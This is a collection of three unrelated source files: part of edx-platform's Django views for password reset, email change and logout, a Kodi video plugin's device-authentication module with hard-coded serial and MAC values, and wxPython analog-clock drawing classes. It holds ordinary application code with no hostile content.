    uidb64 = uidb36_to_uidb64(uidb36)
    platform_name = {
        "platform_name": configuration_helpers.get_value('platform_name', settings.PLATFORM_NAME)
    }
    try:
        uid_int = base36_to_int(uidb36)
        user = User.objects.get(id=uid_int)
    except (ValueError, User.DoesNotExist):
        # if there's any error getting a user, just let django's
        # password_reset_confirm function handle it.
        return password_reset_confirm(
            request, uidb64=uidb64, token=token, extra_context=platform_name
        )

    if request.method == 'POST':
        password = request.POST['new_password1']
        is_password_valid, password_err_msg = validate_password(user, password)
        if not is_password_valid:
            # We have a password reset attempt which violates some security
            # policy. Use the existing Django template to communicate that
            # back to the user.
            context = {
                'validlink': False,
                'form': None,
                'title': _('Password reset unsuccessful'),
                'err_msg': password_err_msg,
            }
            context.update(platform_name)
            return TemplateResponse(
                request, 'registration/password_reset_confirm.html', context
            )

        # remember what the old password hash is before we call down
        old_password_hash = user.password

        response = password_reset_confirm(
            request, uidb64=uidb64, token=token, extra_context=platform_name
        )

        # If password reset was unsuccessful a template response is returned (status_code 200).
        # Check if form is invalid then show an error to the user.
        # Note if password reset was successful we get response redirect (status_code 302).
        if response.status_code == 200 and not response.context_data['form'].is_valid():
            response.context_data['err_msg'] = _('Error in resetting your password. Please try again.')
            return response

        # get the updated user
        updated_user = User.objects.get(id=uid_int)

        # did the password hash change, if so record it in the PasswordHistory
        if updated_user.password != old_password_hash:
            entry = PasswordHistory()
            entry.create(updated_user)

    else:
        response = password_reset_confirm(
            request, uidb64=uidb64, token=token, extra_context=platform_name
        )

        response_was_successful = response.context_data.get('validlink')
        if response_was_successful and not user.is_active:
            # as documented above, a successful visit to the reset link
            # also activates the account
            user.is_active = True
            user.save()

    return response
def reactivation_email_for_user(user):
    """Send a fresh account-activation e-mail to ``user``.

    Returns a JsonResponse with ``success`` True/False; failure cases are
    a missing Registration record and mail-sending errors.
    """
    try:
        reg = Registration.objects.get(user=user)
    except Registration.DoesNotExist:
        return JsonResponse({
            "success": False,
            "error": _('No inactive user with this e-mail exists'),
        })  # TODO: this should be status code 400  # pylint: disable=fixme

    context = {
        'name': user.profile.name,
        'key': reg.activation_key,
    }

    subject = render_to_string('emails/activation_email_subject.txt', context)
    # the subject must be a single line
    subject = ''.join(subject.splitlines())
    message = render_to_string('emails/activation_email.txt', context)
    from_address = configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)

    try:
        user.email_user(subject, message, from_address)
    except Exception:  # pylint: disable=broad-except
        log.error(
            u'Unable to send reactivation email from "%s" to "%s"',
            from_address,
            user.email,
            exc_info=True
        )
        return JsonResponse({
            "success": False,
            "error": _('Unable to send reactivation email')
        })  # TODO: this should be status code 500  # pylint: disable=fixme

    return JsonResponse({"success": True})
def validate_new_email(user, new_email):
    """
    Do basic verification of a proposed new e-mail address for ``user``.

    Raises:
        ValueError: if the address is syntactically invalid, identical to
            the user's current address, or already used by another account.
    """
    try:
        validate_email(new_email)
    except ValidationError:
        raise ValueError(_('Valid e-mail address required.'))

    if new_email == user.email:
        raise ValueError(_('Old email is the same as the new email.'))

    # exists() issues a cheap EXISTS query instead of COUNT(*) over the table
    if User.objects.filter(email=new_email).exists():
        raise ValueError(_('An account with this e-mail already exists.'))
def do_email_change_request(user, new_email, activation_key=None):
    """
    Given a new email for a user, does some basic verification of the new address and sends an activation message
    to the new address. If any issues are encountered with verification or sending the message, a ValueError will
    be thrown.
    """
    # NOTE(review): no validation of new_email happens in this function
    # itself; callers presumably run validate_new_email() first -- confirm.
    # Reuse the user's existing pending-change record, if any.
    pec_list = PendingEmailChange.objects.filter(user=user)
    if len(pec_list) == 0:
        pec = PendingEmailChange()
        pec.user = user
    else:
        pec = pec_list[0]

    # if activation_key is not passing as an argument, generate a random key
    if not activation_key:
        activation_key = uuid.uuid4().hex

    pec.new_email = new_email
    pec.activation_key = activation_key
    pec.save()

    context = {
        'key': pec.activation_key,
        'old_email': user.email,
        'new_email': pec.new_email
    }

    subject = render_to_string('emails/email_change_subject.txt', context)
    # the subject must be a single line
    subject = ''.join(subject.splitlines())
    message = render_to_string('emails/email_change.txt', context)

    from_address = configuration_helpers.get_value(
        'email_from_address',
        settings.DEFAULT_FROM_EMAIL
    )

    try:
        mail.send_mail(subject, message, from_address, [pec.new_email])
    except Exception:  # pylint: disable=broad-except
        log.error(u'Unable to send email activation link to user from "%s"', from_address, exc_info=True)
        raise ValueError(_('Unable to send email activation link. Please try again later.'))

    # When the email address change is complete, a "edx.user.settings.changed" event will be emitted.
    # But because changing the email address is multi-step, we also emit an event here so that we can
    # track where the request was initiated.
    tracker.emit(
        SETTING_CHANGE_INITIATED,
        {
            "setting": "email",
            "old": context['old_email'],
            "new": context['new_email'],
            "user_id": user.id,
        }
    )
@ensure_csrf_cookie
def confirm_email_change(request, key):  # pylint: disable=unused-argument
    """
    User requested a new e-mail. This is called when the activation
    link is clicked. We confirm with the old e-mail, and update.

    The whole flow runs inside one atomic transaction: an unknown key, an
    already-taken new address, or a failure to e-mail either address rolls
    the transaction back and renders an error page instead of committing.
    """
    with transaction.atomic():
        try:
            pec = PendingEmailChange.objects.get(activation_key=key)
        except PendingEmailChange.DoesNotExist:
            response = render_to_response("invalid_email_key.html", {})
            transaction.set_rollback(True)
            return response

        user = pec.user
        address_context = {
            'old_email': user.email,
            'new_email': pec.new_email
        }

        # exists() avoids fetching every matching row just to test emptiness
        if User.objects.filter(email=pec.new_email).exists():
            response = render_to_response("email_exists.html", {})
            transaction.set_rollback(True)
            return response

        subject = render_to_string('emails/email_change_subject.txt', address_context)
        # the subject must be a single line
        subject = ''.join(subject.splitlines())
        message = render_to_string('emails/confirm_email_change.txt', address_context)
        u_prof = UserProfile.objects.get(user=user)
        meta = u_prof.get_meta()
        if 'old_emails' not in meta:
            meta['old_emails'] = []
        # keep an audit trail of previous addresses with a UTC timestamp
        meta['old_emails'].append([user.email, datetime.datetime.now(UTC).isoformat()])
        u_prof.set_meta(meta)
        u_prof.save()
        # Send it to the old email...
        try:
            user.email_user(
                subject,
                message,
                configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
            )
        except Exception:  # pylint: disable=broad-except
            log.warning('Unable to send confirmation email to old address', exc_info=True)
            response = render_to_response("email_change_failed.html", {'email': user.email})
            transaction.set_rollback(True)
            return response

        user.email = pec.new_email
        user.save()
        pec.delete()
        # And send it to the new email...
        try:
            user.email_user(
                subject,
                message,
                configuration_helpers.get_value('email_from_address', settings.DEFAULT_FROM_EMAIL)
            )
        except Exception:  # pylint: disable=broad-except
            log.warning('Unable to send confirmation email to new address', exc_info=True)
            response = render_to_response("email_change_failed.html", {'email': pec.new_email})
            transaction.set_rollback(True)
            return response

        response = render_to_response("email_change_successful.html", address_context)
        return response
@require_POST
@login_required
@ensure_csrf_cookie
def change_email_settings(request):
    """Modify logged-in user's setting for receiving emails from a course."""
    user = request.user

    course_id = request.POST.get("course_id")
    course_key = SlashSeparatedCourseKey.from_deprecated_string(course_id)

    if request.POST.get("receive_emails"):
        # Opting in: drop any existing opt-out record for this course.
        existing_optout = Optout.objects.filter(user=user, course_id=course_key)
        if existing_optout:
            existing_optout.delete()
        log.info(
            u"User %s (%s) opted in to receive emails from course %s",
            user.username,
            user.email,
            course_id,
        )
        track.views.server_track(
            request,
            "change-email-settings",
            {"receive_emails": "yes", "course": course_id},
            page='dashboard',
        )
    else:
        # Opting out: ensure exactly one opt-out record exists.
        Optout.objects.get_or_create(user=user, course_id=course_key)
        log.info(
            u"User %s (%s) opted out of receiving emails from course %s",
            user.username,
            user.email,
            course_id,
        )
        track.views.server_track(
            request,
            "change-email-settings",
            {"receive_emails": "no", "course": course_id},
            page='dashboard',
        )

    return JsonResponse({"success": True})
class LogoutView(TemplateView):
    """
    Logs out user and redirects.

    The template should load iframes to log the user out of OpenID Connect services.
    See http://openid.net/specs/openid-connect-logout-1_0.html.
    """
    # OAuth client ids captured from the session before logout clears it
    oauth_client_ids = []
    template_name = 'logout.html'

    # Keep track of the page to which the user should ultimately be redirected.
    target = reverse_lazy('cas-logout') if settings.FEATURES.get('AUTH_USE_CAS') else '/'

    def dispatch(self, request, *args, **kwargs):
        """Log the user out, then render the OIDC logout page or redirect."""
        # We do not log here, because we have a handler registered to perform logging on successful logouts.
        request.is_from_logout = True

        # Get the list of authorized clients before we clear the session.
        self.oauth_client_ids = request.session.get(edx_oauth2_provider.constants.AUTHORIZED_CLIENTS_SESSION_KEY, [])

        logout(request)

        # If we don't need to deal with OIDC logouts, just redirect the user.
        if LogoutViewConfiguration.current().enabled and self.oauth_client_ids:
            response = super(LogoutView, self).dispatch(request, *args, **kwargs)
        else:
            response = redirect(self.target)

        # Clear the cookie used by the edx.org marketing site
        delete_logged_in_cookies(response)

        return response

    def _build_logout_url(self, url):
        """
        Builds a logout URL with the `no_redirect` query string parameter.

        Args:
            url (str): IDA logout URL

        Returns:
            str
        """
        scheme, netloc, path, query_string, fragment = urlsplit(url)
        query_params = parse_qs(query_string)
        query_params['no_redirect'] = 1
        new_query_string = urlencode(query_params, doseq=True)
        return urlunsplit((scheme, netloc, path, new_query_string, fragment))

    def get_context_data(self, **kwargs):
        context = super(LogoutView, self).get_context_data(**kwargs)

        # Create a list of URIs that must be called to log the user out of all of the IDAs.
        uris = Client.objects.filter(client_id__in=self.oauth_client_ids,
                                     logout_uri__isnull=False).values_list('logout_uri', flat=True)

        referrer = self.request.META.get('HTTP_REFERER', '').strip('/')

        logout_uris = []
        for uri in uris:
            # NOTE(review): this appears to skip the referring IDA's own
            # logout URI, since this request already clears its session --
            # confirm intent.
            if not referrer or (referrer and not uri.startswith(referrer)):
                logout_uris.append(self._build_logout_url(uri))

        context.update({
            'target': self.target,
            'logout_uris': logout_uris,
        })

        return context
| deepsrijit1105/edx-platform | common/djangoapps/student/views.py | Python | agpl-3.0 | 104,572 |
# -*- coding: utf-8 -*-
# Импортируем нужные нам библиотеки
# import urllib
# import urlparse
# import urllib2
# import time
# import sys
# import os
# try:
# import json
# except ImportError:
# import simplejson as json
import string
import random
from uuid import getnode as get_mac
# import xbmcaddon
import requests
# Per-session account state, filled in by auth() from the auth server's
# response; the initial all-zero values mean "not authenticated yet".
USER = {'ID':0,
        'IP':0,
        'BALANCE':0,
        'ACTIVE':0,
        'FREE':0,
        'FREEZE':0,
        'BLOCK':0,
        'TRY':0,
        'TRYDATE':0,
        'SOHO_BILLING':0,
        'SOHO_USER':0,
        'GROUPS':''
        }
def resolve_device():
    """Return a (serial, mac) pair identifying this device.

    Both values are currently hard-coded, which makes the generation
    fallbacks below dead code.
    """
    global serial, mac
    serial = 'JHCNHA5IR42H6'
    mac = '84a466a6f089'
    # serial = _addon.getSetting("auth.serial")
    # mac = _addon.getSetting("auth.mac")
    # serial = uuid.uuid5(uuid.NAMESPACE_DNS, mac).hex[-13:]
    # NOTE(review): the two branches below are unreachable while serial/mac
    # are hard-coded above; if re-enabled they would raise NameError because
    # `_addon` (xbmcaddon) is commented out at the top of the file.
    if not serial:
        serial = ''.join(random.choice(string.ascii_uppercase + string.digits) for _ in range(14))
        _addon.setSetting("auth.serial", serial)
    if not mac:
        mac = ''.join(("%012X" % get_mac())[i:i+2] for i in range(0, 12, 2))
        _addon.setSetting("auth.mac", mac)
        _addon.setSetting("auth.generated", 1)
    return serial, mac
def auth():
    """Query the auth backend for this device and refresh the global USER
    dict in place; returns USER."""
    resp = requests.auth_req(serial, mac)
    if resp['id'] <= 200000:
        # ids at or below 200000 are treated as unauthorised: reset the
        # account fields, keeping only the reported IP
        USER.update({
            'ID': -1,
            'IP': resp['ip'],
            'BALANCE': 0,
            'ACTIVE': 0,
            'FREE': 0,
            'FREEZE': 0,
            'BLOCK': 0,
            'TRY': 0,
            'TRYDATE': 0,
            'SOHO_BILLING': 0,
            'SOHO_USER': 0,
            'GROUPS': '',
        })
    else:
        USER.update({
            'ID': resp['id'],
            'IP': resp['ip'],
            'BALANCE': resp['balance'],
            'ACTIVE': int(resp['active']),
            'FREE': resp['free'],
            'FREEZE': resp['freeze'],
            'BLOCK': resp['block'],
            'TRY': resp['try'],
            'TRYDATE': resp['try_to_date'],
            'SOHO_BILLING': resp['soho_billing'],
            'SOHO_USER': resp['soho_user'],
            'GROUPS': resp['groups'],
        })
    return USER
# def authorization_loop(period):
# auth(serial, mac)
# # threading.Timer(15, printit).start()
# # auth(serial, mac)
| Limeone/plugin.video.bonus | auth.py | Python | gpl-3.0 | 2,196 |
# AnalogClock's base classes
# E. A. Tacao <e.a.tacao |at| estadao.com.br>
# http://j.domaindlx.com/elements28/wxpython/
# 15 Fev 2006, 22:00 GMT-03:00
# Distributed under the wxWidgets license.
from time import strftime, localtime
import math
import wx
from styles import *
#----------------------------------------------------------------------
_targets = [HOUR, MINUTE, SECOND]
#----------------------------------------------------------------------
class Element:
    """Base class for face, hands and tick marks."""

    def __init__(self, idx=0, pos=None, size=None, offset=0, clocksize=None,
                 scale=1, rotate=False, kind=""):
        self.idx = idx              # index of this element within its set
        self.pos = pos              # centre position (wx.Point)
        self.size = size            # base size, multiplied by `scale` on draw
        self.offset = offset        # extra distance from the clock border
        self.clocksize = clocksize  # size of the whole clock (wx.Size)
        self.scale = scale
        self.rotate = rotate        # whether Draw() uses the rotated routine
        self.kind = kind            # "hours" or "minutes" for tick sets

        self.text = None            # label, set by text-based tick subclasses
        # angular distance between consecutive ticks: 30 degrees for the 12
        # hour marks, 6 degrees for the 60 minute marks
        self.angfac = [6, 30][self.kind == "hours"]

    def _pol2rect(self, m, t):
        """Convert polar (magnitude, angle in degrees) to rectangular."""
        return m * math.cos(math.radians(t)), m * math.sin(math.radians(t))

    def _rect2pol(self, x, y):
        """Convert rectangular coordinates to polar (magnitude, degrees)."""
        return math.hypot(x, y), math.degrees(math.atan2(y, x))

    def DrawRotated(self, dc, offset=0):
        pass

    def DrawStraight(self, dc, offset=0):
        pass

    def Draw(self, dc, offset=0):
        """Dispatch to the rotated or straight drawing routine."""
        if self.rotate:
            self.DrawRotated(dc, offset)
        else:
            self.DrawStraight(dc, offset)

    def RecalcCoords(self, clocksize, centre, scale):
        pass

    def GetSize(self):
        return self.size

    def GetOffset(self):
        return self.offset

    def GetIsRotated(self):
        # Fixed: this method used to take a spurious `rotate` argument,
        # which broke no-argument callers such as TickSet.GetIsRotated().
        return self.rotate

    def GetMaxSize(self, scale=1):
        return self.size * scale

    def GetScale(self):
        return self.scale

    def GetPolygon(self):
        return self.polygon

    def SetPosition(self, pos):
        self.pos = pos

    def SetSize(self, size):
        self.size = size

    def SetOffset(self, offset):
        self.offset = offset

    def SetClockSize(self, clocksize):
        self.clocksize = clocksize

    def SetScale(self, scale):
        self.scale = scale

    def SetIsRotated(self, rotate):
        self.rotate = rotate

    def SetPolygon(self, polygon):
        self.polygon = polygon
#----------------------------------------------------------------------
class ElementWithDyer(Element):
    """Base class for clock face and hands.

    Adds a Dyer holding the fill/border/shadow colours and exposes thin
    delegating accessors for its attributes.
    """

    def __init__(self, **kwargs):
        # the "dyer" kwarg is consumed here; everything else goes to Element
        self.dyer = kwargs.pop("dyer", Dyer())
        Element.__init__(self, **kwargs)

    def GetFillColour(self):
        return self.dyer.GetFillColour()

    def GetBorderColour(self):
        return self.dyer.GetBorderColour()

    def GetBorderWidth(self):
        return self.dyer.GetBorderWidth()

    def GetShadowColour(self):
        return self.dyer.GetShadowColour()

    def SetFillColour(self, colour):
        self.dyer.SetFillColour(colour)

    def SetBorderColour(self, colour):
        self.dyer.SetBorderColour(colour)

    def SetBorderWidth(self, width):
        self.dyer.SetBorderWidth(width)

    def SetShadowColour(self, colour):
        self.dyer.SetShadowColour(colour)
#----------------------------------------------------------------------
class Face(ElementWithDyer):
    """Clock face: a filled circle centred on the clock."""

    def __init__(self, **kwargs):
        ElementWithDyer.__init__(self, **kwargs)

    def Draw(self, dc):
        """Draw the face using the dyer's pen and brush."""
        self.dyer.Select(dc)
        dc.DrawCircle(self.pos.x, self.pos.y, self.radius)

    def RecalcCoords(self, clocksize, centre, scale):
        """Fit the face inside the shortest clock dimension."""
        shortest = min(clocksize.Get())
        self.pos = centre
        self.radius = shortest / 2. - self.dyer.width / 2.
#----------------------------------------------------------------------
class Hand(ElementWithDyer):
    """Holds info about a clock hand."""

    def __init__(self, **kwargs):
        # lenfac: fraction of the clock radius this hand should span
        self.lenfac = kwargs.pop("lenfac")
        ElementWithDyer.__init__(self, **kwargs)

        # unit outline of the hand, pointing "down" (positive y); it is
        # scaled and rotated on every Draw() call
        self.SetPolygon([[-1, 0], [0, -1], [1, 0], [0, 4]])

    def Draw(self, dc, end, offset=0):
        """Draw the hand.

        ``end`` is a (radius, centre, angle-in-radians) tuple; ``offset``
        shifts the polygon (used for the shadow pass).
        """
        radius, centre, r = end
        angle = math.degrees(r)
        polygon = self.polygon[:]
        # vertical scale so the longest vertex reaches the clock radius;
        # the hand's own length is then lenfac * radius
        vscale = radius / max([y for x, y in polygon])

        for i, (x, y) in enumerate(polygon):
            x *= self.scale * self.size
            y *= vscale * self.lenfac
            # rotate each vertex around the origin via polar coordinates
            m, t = self._rect2pol(x, y)
            polygon[i] = self._pol2rect(m, t - angle)

        dc.DrawPolygon(polygon, centre.x + offset, centre.y + offset)

    def RecalcCoords(self, clocksize, centre, scale):
        self.pos = centre
        self.scale = scale
#----------------------------------------------------------------------
class TickSquare(Element):
    """Square tick mark."""

    def __init__(self, **kwargs):
        Element.__init__(self, **kwargs)

    def Draw(self, dc, offset=0):
        """Draw a square of side size * scale centred on self.pos."""
        side = self.size * self.scale
        left = self.pos.x - side / 2.
        top = self.pos.y - side / 2.
        dc.DrawRectangle(left + offset, top + offset, side, side)
#----------------------------------------------------------------------
class TickCircle(Element):
    """Circular tick mark."""

    def __init__(self, **kwargs):
        Element.__init__(self, **kwargs)

    def Draw(self, dc, offset=0):
        """Draw a circle of diameter size * scale centred on self.pos."""
        r = self.size * self.scale / 2.
        dc.DrawCircle(self.pos.x + offset, self.pos.y + offset, r)
#----------------------------------------------------------------------
class TickPoly(Element):
    """Holds info about a polygonal tick mark."""

    def __init__(self, **kwargs):
        Element.__init__(self, **kwargs)

        # unit outline of the tick polygon; scaled in _calcPolygon()
        self.SetPolygon([[0, 1], [1, 0], [2, 1], [1, 5]])

    def _calcPolygon(self):
        """Return (scaled polygon, its width, its height)."""
        width = max([x for x, y in self.polygon])
        height = max([y for x, y in self.polygon])
        # uniform scale so the largest dimension equals size * scale
        tscale = self.size / max(width, height) * self.scale
        polygon = [(x * tscale, y * tscale) for x, y in self.polygon]

        width = max([x for x, y in polygon])
        height = max([y for x, y in polygon])

        return polygon, width, height

    def DrawStraight(self, dc, offset=0):
        polygon, width, height = self._calcPolygon()
        # centre the polygon on self.pos
        x = self.pos.x - width / 2.
        y = self.pos.y - height / 2.
        dc.DrawPolygon(polygon, x + offset, y + offset)

    def DrawRotated(self, dc, offset=0):
        polygon, width, height = self._calcPolygon()
        # rotation angle in degrees for this tick's position on the dial
        angle = 360 - self.angfac * (self.idx + 1)
        r = math.radians(angle)

        # rotate each vertex around the origin via polar coordinates
        for i in range(len(polygon)):
            m, t = self._rect2pol(*polygon[i])
            t -= angle
            polygon[i] = self._pol2rect(m, t)

        # shift so the rotated polygon stays centred on self.pos
        x = self.pos.x - math.cos(r) * width / 2. - math.sin(r) * height / 2.
        y = self.pos.y - math.cos(r) * height / 2. + math.sin(r) * width / 2.

        dc.DrawPolygon(polygon, x + offset, y + offset)
#----------------------------------------------------------------------
class TickDecimal(Element):
    """Tick mark labelled with a decimal number (1-based index)."""

    def __init__(self, **kwargs):
        Element.__init__(self, **kwargs)

        self.text = "%s" % (self.idx + 1)

    def DrawStraight(self, dc, offset=0):
        # centre the label on self.pos
        width, height = dc.GetTextExtent(self.text)
        x = self.pos.x - width / 2.
        y = self.pos.y - height / 2.
        dc.DrawText(self.text, x + offset, y + offset)

    def DrawRotated(self, dc, offset=0):
        width, height = dc.GetTextExtent(self.text)
        # rotation angle in degrees for this tick's position on the dial
        angle = 360 - self.angfac * (self.idx + 1)
        r = math.radians(angle)

        # shift so the rotated text stays centred on self.pos
        x = self.pos.x - math.cos(r) * width / 2. - math.sin(r) * height / 2.
        y = self.pos.y - math.cos(r) * height / 2. + math.sin(r) * width / 2.

        dc.DrawRotatedText(self.text, x + offset, y + offset, angle)
#----------------------------------------------------------------------
class TickRoman(TickDecimal):
    """Tick mark labelled with a Roman numeral.

    Replaces the previous 60-entry hand-written table with an algorithmic
    converter; it produces the same subtractive-notation numerals
    ("IV", "IX", "XL", ...) for every index a clock face needs.
    """

    # value/symbol pairs in descending order; values above 50 are never
    # needed because tick indices stop at 60 ("LX" = 50 + 10).
    _ROMAN = [(50, "L"), (40, "XL"), (10, "X"), (9, "IX"),
              (5, "V"), (4, "IV"), (1, "I")]

    def __init__(self, **kwargs):
        TickDecimal.__init__(self, **kwargs)
        self.text = self._to_roman(self.idx + 1)

    @staticmethod
    def _to_roman(n):
        """Return the Roman numeral for an integer 1 <= n <= 89."""
        parts = []
        for value, symbol in TickRoman._ROMAN:
            count, n = divmod(n, value)
            parts.append(symbol * count)
        return "".join(parts)
#----------------------------------------------------------------------
class TickBinary(TickDecimal):
    """Tick mark labelled with a binary number."""

    def __init__(self, **kwargs):
        TickDecimal.__init__(self, **kwargs)
        # zero-padded to at least 4 digits, e.g. 3 -> "0011", 20 -> "10100"
        self.text = format(self.idx + 1, "04b")
#----------------------------------------------------------------------
class TickHex(TickDecimal):
    """Tick mark labelled with an upper-case hexadecimal number."""

    def __init__(self, **kwargs):
        TickDecimal.__init__(self, **kwargs)
        self.text = "%X" % (self.idx + 1)
#----------------------------------------------------------------------
class TickNone(Element):
    """Null tick mark: takes part in layout but draws nothing."""

    def __init__(self, **kwargs):
        Element.__init__(self, **kwargs)

    def Draw(self, dc, offset=0):
        pass
#----------------------------------------------------------------------
class Dyer:
    """Stores info about colours and borders of clock Elements."""

    def __init__(self, border=None, width=0, fill=None, shadow=None):
        """
        self.border (wx.Colour) border colour
        self.width  (int)       border width
        self.fill   (wx.Colour) fill colour
        self.shadow (wx.Colour) shadow colour
        """
        syscolour = wx.SystemSettings.GetColour
        self.border = border or syscolour(wx.SYS_COLOUR_WINDOWTEXT)
        self.fill = fill or syscolour(wx.SYS_COLOUR_WINDOWTEXT)
        self.shadow = shadow or syscolour(wx.SYS_COLOUR_3DSHADOW)
        self.width = width

    def Select(self, dc, shadow=False):
        """Selects the current settings into the dc.

        With shadow=True everything is drawn in the shadow colour.
        """
        pen_colour = self.shadow if shadow else self.border
        body_colour = self.shadow if shadow else self.fill
        dc.SetPen(wx.Pen(pen_colour, self.width, wx.SOLID))
        dc.SetBrush(wx.Brush(body_colour, wx.SOLID))
        dc.SetTextForeground(body_colour)

    def GetFillColour(self):
        return self.fill

    def GetBorderColour(self):
        return self.border

    def GetBorderWidth(self):
        return self.width

    def GetShadowColour(self):
        return self.shadow

    def SetFillColour(self, colour):
        self.fill = colour

    def SetBorderColour(self, colour):
        self.border = colour

    def SetBorderWidth(self, width):
        self.width = width

    def SetShadowColour(self, colour):
        self.shadow = colour
#----------------------------------------------------------------------
class HandSet:
    """Manages the set of hands (hour, minute, second)."""

    def __init__(self, parent, h, m, s):
        self.parent = parent
        self.hands = [h, m, s]      # order matches the _targets module list
        self.radius = 1
        self.centre = wx.Point(1, 1)

    def _draw(self, dc, shadow=False):
        """Draw every enabled hand; shadow=True draws the shadow pass."""
        ends = [int(x) for x in strftime("%I %M %S", localtime()).split()]
        flags = [self.parent.clockStyle & flag \
                 for flag in self.parent.allHandStyles]
        a_hand = self.hands[0]

        if shadow:
            offset = self.parent.shadowOffset * a_hand.GetScale()
        else:
            offset = 0

        for i, hand in enumerate(self.hands):
            # Is this hand supposed to be drawn?
            if flags[i]:
                idx = ends[i]
                # Is this the hours hand?
                if i == 0:
                    # NOTE(review): relies on integer division of minutes
                    # (Python 2 semantics); under Python 3 this yields a
                    # fractional index -- confirm target version.
                    idx = idx * 5 + ends[1] / 12 - 1
                # else prevent exceptions on leap seconds
                elif idx <= 0 or idx > 60:
                    idx = 59
                # and adjust idx offset for minutes and non-leap seconds
                else:
                    idx = idx - 1
                angle = math.radians(180 - 6 * (idx + 1))
                hand.dyer.Select(dc, shadow)
                hand.Draw(dc, (self.radius, self.centre, angle), offset)

    def Draw(self, dc):
        if self.parent.clockStyle & SHOW_SHADOWS:
            self._draw(dc, True)
        self._draw(dc)

    def RecalcCoords(self, clocksize, centre, scale):
        self.centre = centre
        [hand.RecalcCoords(clocksize, centre, scale) for hand in self.hands]

    def SetMaxRadius(self, radius):
        self.radius = radius

    def GetSize(self, target):
        r = []
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                r.append(hand.GetSize())
        return tuple(r)

    def GetFillColour(self, target):
        r = []
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                r.append(hand.GetFillColour())
        return tuple(r)

    def GetBorderColour(self, target):
        r = []
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                r.append(hand.GetBorderColour())
        return tuple(r)

    def GetBorderWidth(self, target):
        r = []
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                r.append(hand.GetBorderWidth())
        return tuple(r)

    def GetShadowColour(self, target=None):
        # Fixed: `target` was referenced but never declared as a parameter,
        # so this method always raised NameError. It now accepts a target
        # like the other getters and defaults to all hands, resolved at
        # call time so module import stays independent of `styles`.
        if target is None:
            target = HOUR | MINUTE | SECOND
        r = []
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                r.append(hand.GetShadowColour())
        return tuple(r)

    def SetSize(self, size, target):
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                hand.SetSize(size)

    def SetFillColour(self, colour, target):
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                hand.SetFillColour(colour)

    def SetBorderColour(self, colour, target):
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                hand.SetBorderColour(colour)

    def SetBorderWidth(self, width, target):
        for i, hand in enumerate(self.hands):
            if _targets[i] & target:
                hand.SetBorderWidth(width)

    def SetShadowColour(self, colour):
        for i, hand in enumerate(self.hands):
            hand.SetShadowColour(colour)
#----------------------------------------------------------------------
class TickSet:
    """Manages a set of tick marks.

    A TickSet is either the 12 hour marks or the 60 minute marks of the
    clock face; the ``kind`` keyword argument selects which.
    """

    def __init__(self, parent, **kwargs):
        self.parent = parent
        self.dyer = Dyer()
        # Number of elements in this set: 60 minute ticks or 12 hour ticks.
        self.noe = {"minutes": 60, "hours": 12}[kwargs["kind"]]
        self.font = wx.SystemSettings.GetFont(wx.SYS_DEFAULT_GUI_FONT)
        # 'style' is consumed here; the remaining kwargs are forwarded to
        # the tick objects created in SetStyle().
        style = kwargs.pop("style")
        self.kwargs = kwargs
        self.SetStyle(style)

    def _draw(self, dc, shadow=False):
        """Draw all visible ticks; when `shadow` is true, draw their
        shadows at the configured offset instead."""
        dc.SetFont(self.font)
        a_tick = self.ticks[0]
        if shadow:
            offset = self.parent.shadowOffset * a_tick.GetScale()
        else:
            offset = 0
        clockStyle = self.parent.clockStyle
        for idx, tick in self.ticks.items():
            draw = False
            # Are we a set of hours?
            if self.noe == 12:
                # Should we show all hours ticks?
                if clockStyle & SHOW_HOURS_TICKS:
                    draw = True
                # Or is this tick a quarter and should we show only quarters?
                elif clockStyle & SHOW_QUARTERS_TICKS and not (idx + 1) % 3.:
                    draw = True
            # Are we a set of minutes and minutes should be shown?
            elif self.noe == 60 and clockStyle & SHOW_MINUTES_TICKS:
                # If this tick occupies the same position of an hour/quarter
                # tick, should we still draw it anyway?
                if clockStyle & OVERLAP_TICKS:
                    draw = True
                # Right, sir. I promise I won't overlap any tick.
                else:
                    # Ensure that this tick won't overlap an hour tick.
                    if clockStyle & SHOW_HOURS_TICKS:
                        if (idx + 1) % 5.:
                            draw = True
                    # Ensure that this tick won't overlap a quarter tick.
                    elif clockStyle & SHOW_QUARTERS_TICKS:
                        if (idx + 1) % 15.:
                            draw = True
                    # We're not drawing quarters nor hours, so we can draw
                    # all minutes ticks.
                    else:
                        draw = True
            if draw:
                tick.Draw(dc, offset)

    def Draw(self, dc):
        """Draw the tick set (shadows first when enabled, then the ticks)."""
        if self.parent.clockStyle & SHOW_SHADOWS:
            self.dyer.Select(dc, True)
            self._draw(dc, True)
        self.dyer.Select(dc)
        self._draw(dc)

    def RecalcCoords(self, clocksize, centre, scale):
        """Recompute the position of every tick for a new clock size."""
        a_tick = self.ticks[0]
        size = a_tick.GetMaxSize(scale)
        maxsize = size
        # Try to find a 'good' max size for text-based ticks.
        if a_tick.text is not None:
            self.font.SetPointSize(size)
            dc = wx.MemoryDC()
            dc.SelectObject(wx.EmptyBitmap(*clocksize.Get()))
            dc.SetFont(self.font)
            maxsize = size
            for tick in self.ticks.values():
                maxsize = max(*(dc.GetTextExtent(tick.text) + (maxsize,)))
        radius = self.radius = min(clocksize.Get()) / 2. - \
                               self.dyer.width / 2. - \
                               maxsize / 2. - \
                               a_tick.GetOffset() * scale - \
                               self.parent.shadowOffset * scale
        # If we are a set of hours, the number of elements of this tickset is
        # 12 and ticks are separated by a distance of 30 degrees;
        # if we are a set of minutes, the number of elements of this tickset
        # is 60 and ticks are separated by a distance of 6 degrees.
        angfac = [6, 30][self.noe == 12]
        for i, tick in self.ticks.items():
            tick.SetClockSize(clocksize)
            tick.SetScale(scale)
            deg = 180 - angfac * (i + 1)
            angle = math.radians(deg)
            x = centre.x + radius * math.sin(angle)
            y = centre.y + radius * math.cos(angle)
            tick.SetPosition(wx.Point(x, y))

    def GetSize(self):
        return self.kwargs["size"]

    def GetFillColour(self):
        return self.dyer.GetFillColour()

    def GetBorderColour(self):
        return self.dyer.GetBorderColour()

    def GetBorderWidth(self):
